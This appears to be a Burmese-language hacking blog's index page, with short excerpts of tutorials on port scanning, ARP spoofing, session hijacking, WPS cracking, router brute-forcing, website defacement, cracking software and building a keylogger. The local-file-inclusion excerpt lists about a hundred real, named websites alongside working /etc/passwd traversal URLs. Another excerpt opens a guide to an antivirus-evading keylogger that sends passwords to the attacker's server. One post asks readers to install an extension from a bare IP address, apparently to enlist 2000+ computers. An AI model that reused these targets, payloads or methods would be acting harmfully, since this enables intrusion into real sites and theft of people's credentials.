Port Scanning ဆိုတာ ဘာလဲ ? Port Scanning ဆိုတာ system တစ္ခုရဲ ့ open ျဖစ္ေနတဲ့ port ဒါမွမဟုတ္ active ျဖစ္ေနတဲ့ port ကို ရွာေဖြျခင္းပဲျဖစ္ပါတယ္။ ဘာနဲ ့တူသလဲဆိုေတာ့ သူခိုးက အိမ္တစ္အိမ္ရဲ ့ပြင့္ေနတဲ့ အေပါက္ကို ရွာတဲ့ သေဘာနဲ ့တူတူပါပဲ။ :P ကဲ Port Scanning လုပ္လိုက္ပီဆိုပါေတာ့........ Starting Scan Target Host: www.blarblarblar.com ဒါမွမဟုတ္ IP Address TCP Port :7 (echo) TCP Port :9 (discard) TCP Port :13 (daytime) TCP Port :19 (chargen) TCP...

Introduction to Firewall ကြ်န္ေတာ္တို ့ေက်ာင္းေတြမွာ ဒါမွမဟုတ္ ရံုးခန္းေတြမွာ အင္တာနက္ အသံုးျပဳတဲ့အခါမွာ အခ်ိဳ ့ website (အထူးသျဖင္ ့ social site ေတြျဖစ္တဲ့ Facebook တို ့ Twitter တို ့) ေတြကို အသံုးျပဳလို ့မရပါဘူး။ အဲ့လို အသံုးျပဳလို ့မရေအာင္ Firewall ကို အသံုးျပဳျပီး block ထားၾကတာပါ။ ေနာက္ျပီးေတာ့ Firewall ဟာ Hacker ေတြရဲ ့ရန္ကလည္း ကာကြယ္ေပးပါတယ္ (၁၀၀% ေတာ့မဟုတ္ဘူးဗ်.. ဘာလို ့လဲဆိုေတာ့ firewall ကို ေဖာက္လို ့ရတဲ့ နည္းေတြအမ်ားၾကီးရွိလို ့...

Session Hijacking ဆိုတာဘာလဲ ? Session Hijacking လုပ္တယ္ဆိုတာ ရွိျပီးသား active session တစ္ခုကို ခိုးယူျခင္းပဲျဖစ္ပါတယ္။ Session Hijacking လုပ္ျခင္းရဲ ့အဓိက ရည္ရြယ္ခ်က္ကေတာ့ authentication process ကို bypass လုပ္ျခင္းျဖင့္ website တစ္ခု သို ့မဟုတ္ computer တစ္လံုးကုိ unauthorized access ကို ရယူဖို ့ပဲျဖစ္ပါတယ္။ အရိုးရွင္းဆံုးေျပာရရင္ေတာ့ attacker ဟာ တစ္ျခား client တစ္ေယာက္ရဲ ့ session နဲ ့login လုပ္ျခင္းပဲျဖစ္ပါတယ္။ Session Hijacking ကို ဘယ္လို...

ARP Spoofing ဆိုတာ ကြ်န္ေတာ္ နားလည္သေလာက္ေျပာရမယ္ဆိုရင္ေတာ့ Attacker ေတြက fake Address Resolution Protocol (ARP) ေတြကို Local Area Network ထဲကို ပို ့လႊတ္တာပဲျဖစ္ပါတယ္။ (ကြ်န္ေတာ္သိထားသေလာက္ေျပာတာေနာ္ မျပည့္စံုတာ အမွားအယြင္းပါတယ္ ဆိုရင္ေတာ့ နားလည္သူမ်ား comment ခ်န္ခဲ့ပါ ျပင္သင့္ရင္ ျပင္ပါ့မယ္) ARP Spoofing လုပ္ျခင္းျဖင့္ Attacker ဟာ LAN ထဲမွာရွိတဲ့ Data Frames ေတြကို intercept လုပ္ျခင္း ၊ traffic ကို modify လုပ္ျခင္း ၊ ဒါမွ မဟုတ္ traffic ကို...

ဒီ Tutorial က Wifi Router ရဲ ့ PSK ( Pre-Share Key ) ကို ရဖို ့အတြက္  WPS (Wi-Fi Protected Setup) ကို Bruteforce လုပ္မွာပဲျဖစ္ပါတယ္။ ကဲစလိုက္ၾကရေအာင္ အရင္ဆံုး Terminal ကို ဖြင့္ပါ။ ဖြင့္ျပီးရင္ ေအာက္မွာ ေဖာ္ျပထားတဲ့ command ေတြကို အသံုးျပဳရမွာျဖစ္ပါတယ္ airmon-ng airmon-ng stop [wlan0] airodump-ng [wlan0] မွတ္ခ်က္။ ။  [wlan0] ဆိုတဲ့ေနရာမွာ သင္ crack လုပ္မယ္ wifi ရဲ ့interface ကိုထည့္ရမွာျဖစ္ပါတယ္။ က်ေနာ္ကေတာ့ ဒီမွာ wlan0  နဲ...

Facebook Account lock က်တဲ့အခါမွာ ျပန္ျဖည္ဖို ့အတြက္ photo tag ေတြနဲ ့ verification လုပ္ၾကရတာ ၾကံဳဖူးၾကမယ္ထင္တယ္ဗ်။ ကြ်န္ေတာ္ကိုယ္တိုင္လဲ ခနခန ၾကံဳဖူးတယ္ ပိုဆိုးတာက ကြ်န္ေတာ့ account ထဲက friends ေတာ္ေတာ္မ်ားမ်ား က မ်က္ႏွာဖံုးေတြနဲ ့ ျဖစ္ေနၾကေတာ့ ကြ်န္ေတာ္ကိုယ္တိုင္လဲ ေတာ္ေတာ္ တိုင္ပတ္ခဲ့တယ္ဗ်။ ဒါေပမယ့္ သာမန္ facebook user ေတြအေနနဲ ့အထူးသျဖင့္ friend မ်ားတဲ့လူေတြအတြက္ေတာ့ lock က်သြားလို ့ photo verification ျပန္လုပ္တဲ့အခါ အခက္အခဲ အနည္းငယ္ ရွိတယ္ဗ်။...

တကယ္ေတာ့ အားလံုးသိထားၾကတာ gmail account တစ္ခုကုိ facebook account တစ္ခုပဲ ဖြင့္လို ့ရတယ္ လို ့ပဲ သိထားၾကတယ္။ တဂယ္လဲ facebook က mail တစ္ခုကို account တစ္ခုပဲ ေပးဖြင့္တယ္။ ဒါေပမယ့္ က်ေနာ့္မွာ mail account တစ္ခုတည္းနဲ ့ facebook account ေတြ အမ်ားၾကီးဖြင့္လို ့ရတဲ့နည္းရွိတယ္။ အရင္ဆံုး အသံုးျပဳမယ့္ mail က ဥပမာအေနနဲ ့ koalpha@gmail.com ပဲဆိုပါစို ့။ www.facebook.com ကို သြားျပီးေတာ့ sign up လုပ္ပါ။ အဲ့လို sign up လုပ္တဲ့ေနရာမွာ name တို ့ Date of Birth စသည္ျဖင့္ အားလံုးကို ပံုမွန္အတိုင္းပဲျဖည့္လုိက္ပါ။ ဒါေပမယ့္...

Router တစ္လံုးကို Access လုပ္ဖို ့အတြက္ Username နဲ ့ Password လုိအပ္ပါတယ္။ ဘယ္ အမ်ိဳးအစား Router ျဖစ္ျဖစ္ သူ ့ရဲ ့ Default Username နဲ ့ Password ကို သိရင္ Access လုပ္လို ့ရပါတယ္။ အဲ့ဒါကေတာ့ Password Protection လုပ္ထားတာပါ။ ပထမဆံုးအေနနဲ ့ Brutus ကို အသံုးျပဳဖို ့လိုအပ္ပါတယ္။ Brutus ကို ဖြင့္ပါ။ ျပီးရင္ Brutus Configuration ထဲက Target ေနရာမွာ Router ရဲ ့ IP Address ျဖည့္ပါ User File နဲ ့ Pass File မွာ brute force လုပ္ဖို ့အတြက္  User...

MCA : Reloaded Project ကိုု ဖြင့္လွစ္လိုုက္ပါျပီ... Chrome Browser ရွိတဲ့ လူေတြကေတာ့ ေအာက္ေဖၚျပပါ လိပ္စာမွ Chrome Browser Icon ကိုု နွိပ္ေပးျပီး "Add to Chrome" ကိုု နွိပ္ျပီး ေတာ့ Popup ထဲမွာ Add button ကိုု ထပ္နွိပ္ေပးျခင္းျဖင့္ ပါ၀င္ ဆင္ႏဲြႏိုုင္ပါတယ္၊ MCA Moderators မ်ားကေတာ့ computer ေပါင္း ၂၀၀၀ ေက်ာ္ ပါ၀င္ျပီး ဆင္ႏြဲလာတဲ့အခါ project ကိုု ကိုုယ္တြယ္အသံုုးျပဳမူမ်ားကိုု စတင္ပါမယ္.... လိပ္စာကေတာ့ http://108.178.54.109/mca/index.html...

ဒီပိုစ့္မွာေတာ့ facebook က fixed ျပန္လုပ္ျပီးသား bug တစ္ခု အေၾကာင္းကို တင္ျပေပးသြားမွာျဖစ္ပါတယ္ ဒီ bug ကို ရွာေတြ ့ခဲ့တဲ ့ Fin1te ဆိုတဲ့ ငနဲကေတာ့ US$ 20,000 ရသြားတယ္ဗ်။ အရင္ဆံုး သေဘာတရားကို ေျပာရမယ္ဆိုရင္ေတာ့ fb က သင့္ရဲ ့account တစ္ခုအတြက္ link လုပ္ဖို ့ mobile နံပါတ္ တစ္ခုေတာင္းတယ္ဗ် အဲ့ဒီ mobile ရဲ ့ SMS ကေနတဆင့္ fb news feed ေတြ post ေတြ ကိုလည္း update ရသလို  fb ကို login ၀င္တဲ့အခါ email address အစား အဲ့ ဖုန္းနံပါတ္ကို လည္း အသံုးျပဳလို...

ခုျပမယ့္ နည္းေလးကေတာ့ hotspot shield တစ္ခု ကို tool ေတြ အသံုးမျပဳပဲ manually crack လုပ္တဲ့နည္းေလးပဲျဖစ္ပါတယ္။ crack လုပ္မထားရင္ သင့္ hotspot shield ဟာ ads ေတြ banners ေတြနဲ ့ မ်က္စိေနာက္ေလာက္ေအာင္ျဖစ္ေနပါလိမ့္မယ္။ အရင္ဦးဆံုး မိမိကြန္ပ်ဴတာထဲက ဒီ directory ကို သြားလိုက္ပါ။ C:\Windows\System32\drivers\etc\  အဲ့ folder ထဲကမွ "hosts" ဆိုတဲ့ file ကို ရွာလုိက္ပါ။ ရွာလို ့ေတြ ့ရင္ အဲ့ file ကို Notepad ျဖင့္ဖြင့္ျပီး coding ေတြအားလံုးရဲ ့အဆံုးမွာ...

ဒီနည္းေလးက အဆင့္ရွိတဲ့နည္းေလးတစ္ခုေတာ့မဟုတ္ပါဘူး ၾဆာသမားေတြ အတြက္ေတာ့ ကေလးအထာေလးေတြပါ။ ဒါေပမယ့္ Hacking ကို ေလ့လာကာစ လူေတြအတြက္ေတာ့ နည္းနည္း အထင္ၾကီးေလာက္စရာရွိတယ္ Cgi-suspended pages ဆိုတာ Host ကေန ျဖဳတ္ခ်ခံထားရတဲ့ site pages ေတြကို ေျပာတာျဖစ္ပါတယ္ Attacker အေနနဲ ့ template ကို edit လုပ္ျခင္းျဖင့္ defacing လုပ္ႏုိင္ပါတယ္ သူ ့မွာ အားသာခ်က္တစ္ခု ရွိပါတယ္ အဲ့ဒါကေတာ့ Server တစ္ခုထဲက site တစ္ခု ဟာ suspended ျဖစ္ေနျပီဆိုရင္ အဲ့ Cgi-suspended...

Local File Inclusion Vulnerability ကို အသံုးခ်ျပီး Shell upload လုပ္ဖို ့အတြက္ common parameter အခ်ိဳ ့ကို သိထားဖို ့လိုအပ္ပါတယ္။ index.php?homepage= index.php?page= index.php?index2= LFI နဲ ့ Shell upload လုပ္ဖို ့အတြက္ လိုအပ္တာေတြကေတာ့ ၁။ Vulnerable Website ၂။ Shell ၃။ User-Agent Switcher ( Download ) ၄။ Mozilla FireFox ကြ်န္ေတာ့္ဆီမွာ ရွိေနတဲ vulnerable site ေတြကေတာ့ http://kyengerarotaryclub.org/index.php?page=/etc/passwd http://www.crsfsite.net/main/index.php?page=/etc/passwd http://modelspromo.com/index.php?page=/etc/passwd http://www.mrt.ac.lk/gavel/index.php?page=/etc/passwd http://nyctradeprinting.com/index.php?page=/etc/passwd http://www.dayborodistrict.com.au/index.php?page=/etc/passwd http://schumpeter2011.econ.tuwien.ac.at/index.php?page=/etc/passwd http://www.alinholding.com/index.php?page=/etc/passwd&page_title=home http://diuf.unifr.ch/pai/education/2006_2007/ca/index.php?page=/etc/passwd&subpage=/etc/passwd http://lyantndc.cluster010.ovh.net/index.php?page=/etc/passwd http://mspierphoto.com/index.php?page=/etc/passwd http://www.tottenfarms.com/index.php?site=1&page=/etc/passwd http://www.sohnidharti.tv/main/Urdu/index.php?page=/etc/passwd http://www.crsfsite.net/main/index.php?page=/etc/passwd http://www.expo-ingenieurs.be/index.php?lang=FR&page=/etc/passwd http://www.lovium.nl/index.php?page=/etc/passwd http://www.death-star.net/index.php?Page=/etc/passwd http://www.f-a-t.de/fat_v1/index.php?lang_id=2&page=/etc/passwd http://www.jpistudios.com/redirect.php?page=../../../../../../etc/passwd http://x17agency.com/redirect.php?page=../../../../../etc/passwd http://www.winnerspizza.com/index.php?page=/etc/passwd http://oregon-airsoft.com/index.php?page=/etc/passwd http://www.eyesonmain.ca/index.php?page=/etc/passwd http://www.tottenfarms.com/index.php?page=/etc/passwd http://www.rtscom.com/index.php?page=/etc/passwd http://www.lavieillefrance.fr/index.php?page=/etc/passwd http://www.evoca.ch/index.php?page=../etc/passwd http://estaminetlille.fr/vieille/index.php?page=/etc/passwd http://www.traildumont.be/index.php?page=/etc/passwd&album=12 http://www.speakingfromtheheartinc.com/index.php?page=/etc/passwd http://www.moto-plus.net/index.php?Page=../../../../../etc/passwd http://www.maxparts.ru/index.php?page=/etc/passwd http://www.focusfloors.co.za/?page=../../../../etc/passwd http://www.bushboats.co.za/index.php?page=../../../../etc/passwd http://www.creteform.com/index.php?page=/etc/passwd&PHPSESSID=null http://www.dreisingerfuneralhome.com/index.php?page=../../../../../etc/passwd http://www.iceclub.biz/index.php?page=../../../../etc/passwd http://www.daybororuralfire.com.au/index.php?page=/etc/passwd http://www.spcstamps.com/index.php?page=/etc/passwd&back=null http://www.ninaal.pl/index.php?page=../etc/passwd http://www.tempelwelt.de/index.php?page=../../../../etc/passwd&PHPSESSID=null http://www.mescreations.fr/index.php?page=../../../../etc/passwd http://www.death-star.net/index.php?Page=/etc/passwd&Mode=MDP http://www.scoberbernbach.de/index.php?page=/etc/passwd http://lomejordehuelva.com/index.php?page=/etc/passwd http://pomestam24.ru/index.php?page=/etc/passwd&option=login http://www.kaltimmethanol.com/indo/index.php?page=/etc/passwd http://winnerspizza.com/index.php?page=/etc/passwd http://timslist.com/utechtube/index.php?page=/etc/passwd http://www.fuw.edu.pl/~trawinski/index.php?page=/etc/passwd http://www.memorial-odlozil.cz/odlozil/index.php?page=/etc/passwd http://maxponomarenko.ru/index.php?page=/etc/passwd http://shotgun.cc/index.php?page=/etc/passwd http://www.fair-wohnen.de/index.php?page=../../../../../../etc/passwd http://jhcs.eu/index.php?folder=Kontakt&page=../../../../../etc/passwd http://www.rheuma-liga.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt http://www.hamann-lege.de/index.php?page=/etc/passwd http://www.ulmer-verein.de/uv/index.php?page=/etc/passwd http://proimmo360.com/index.php?page=/etc/passwd http://www.lelo.biz/index.php?name=Kontakt&page=/etc/passwd&items=4 http://www.misbrugscenterherning.dk/index.php?page=../../../../../etc/passwd http://www.wti-juelich.de/index.php?page=/etc/passwd http://www.sekoro.seko-bayern.org/index.php?page=/etc/passwd http://www.immobilieninvest.at/index.php?page=/etc/passwd&PHPSESSID=null http://www.lc-bensberg-schloss.de/index.php?page=../../../../../../../../etc/passwd http://www.ingolstadt.muetterzentren-bayern.de/index.php?page=/etc/passwd http://www.tendokarate.no/index.php?page=/etc/passwd http://www.mstechnical.pl/de/index.php?page=/etc/passwd http://www.k-turm.de/index.php?page=/etc/passwd http://wsc-skiextreme.wir-und-ich.de/index.php?page=../../../etc/passwd http://www.seniorenbueros-bayern.de/index.php?page=/etc/passwd&titel=Kontakt http://www.bodyworld-schkeuditz.de/index.php?page=/etc/passwd http://www.fortschrittwuerzburg.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt http://www.spielmannszug-ffw-oberkotzau.de/index.php?page=/etc/passwd http://proimmo360.com/index.php?page=/etc/passwd http://www.grabowscy.com/index.php?page=/etc/passwd http://www.heilpraxis-geissdoerfer.de/index.php?page=/etc/passwd http://www.selfclean.de/index.php?page=/etc/passwd http://www.ninaal.pl/index.php?page=../etc/passwd http://www.cncmodel.pl/eng/index.php?page=/etc/passwd http://walk-in-the-park.de/index.php?page=/etc/passwd http://www.k-tower.eu/index.php?page=/etc/passwd http://dorfschuetzen.de.dedi926.your-server.de/index.php?page=/etc/passwd&PHPSESSID=null http://www.ma2da.de/index.php?page=/etc/passwd http://www.frauentreff-welden.de/index.php?page=/etc/passwd http://etechnik-wichmann.de/index.php?page=../../../../etc/passwd http://www.erotik-als-lebenskraft.de/index.php?page=/etc/passwd http://84388.webhosting28.1blu.de/huchbaumanagement/index.php?page=/etc/passwd http://www.stotterer-selbsthilfe-regensburg.seko-bayern.org/index.php?page=/etc/passwd http://www.muezeger.de/index.php?page=/etc/passwd http://schlafapnoe.selbsthilfe-wue.de/index.php?page=/etc/passwd http://www.hctjstbk.cz/index.php?page=/etc/passwd http://violetta-tradgard.se/index.php?page=/etc/passwd http://www.sdhpardubice.cz/index.php?page=/etc/passwd http://www.osteoporose.selbsthilfe-wue.de/index.php?page=/etc/passwd http://www.die-drid.de/index.php?mod=kontaktmenu.php&page=/etc/passwd ပထမဆံုးအေနနဲ...

ဒီပိုစ့္မွာေတာ့ Virus Total  လို ဆိုဒ္ မ်ိဳးကေတာ့င္ detect မလုပ္ ေပးႏုိင္တဲ့ keylogger တစ္ခု ဘယ္လို ဖန္တီးမလဲဆိုတာကို အဆင့္ဆင့္ ရွင္းလင္းျပသေပးသြားပါမယ္။ လုပ္ေဆာင္ရမယ့္ အဆင့္ေတြကေတာ့ ၁။ Hack မယ့္ password ေတြကို သိမ္းဆည္းဖို ့ server တစ္ခု ေထာင္ရပါမယ္။ ၂။ keylogger ထည့္သြင္းအသံုးျပဳမယ့္ any software တစ္ခုခု ရဲ ့ icon ကို extrect လုပ္ရပါမယ္။ ၃။ keylogger ကို ဖြက္ဖို ့အတြက္ binding လုပ္ရပါမယ္။ ၄။ ေနာက္ဆံုးအဆင့္အေနနဲ ့keylogger ကို victim ဆီကို spread လုပ္ရပါမယ္။ ၁။ Hack မယ့္ password ေတြကို...